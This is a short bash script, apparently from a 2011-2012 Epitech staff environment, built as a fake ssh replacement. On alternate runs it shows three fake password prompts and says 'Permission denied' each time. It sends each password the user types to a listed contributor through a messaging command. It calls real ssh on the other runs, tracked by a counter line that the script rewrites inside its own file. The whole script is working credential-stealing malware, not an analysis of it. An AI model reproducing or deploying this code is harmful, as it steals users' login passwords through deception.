#!/bin/bash
##
## BOCAL STAFF 2011-2012
## FEDORA DUMP EPITECH
##

CONTRIBUTORS="badaud_t"

N_HIT_MAX=2
N_HIT_MIN=1

res=$(grep ^HIT $0 | cut -d' ' -f2)
if [ $res -eq "$N_HIT_MAX" ]; then
    ssh $*
    sed -i s/^"HIT $N_HIT_MAX"/"HIT $N_HIT_MIN"/ $0
    exit
fi

sed -i s/^"HIT $res"/"HIT $((res+1))"/ $0

if [ $# -eq 0 ]
then
    str=$USER;
else
    str=$1;
fi
i=3
while [ $i -gt 0 ];
do
    echo -n $str"'s password: "
    read -s error
    echo -e "\nPermission denied, please try again."
    for _login in $CONTRIBUTORS
    do ns_send_msg $_login $error;
    done
    ((i-=1))
done

exit

HIT 2
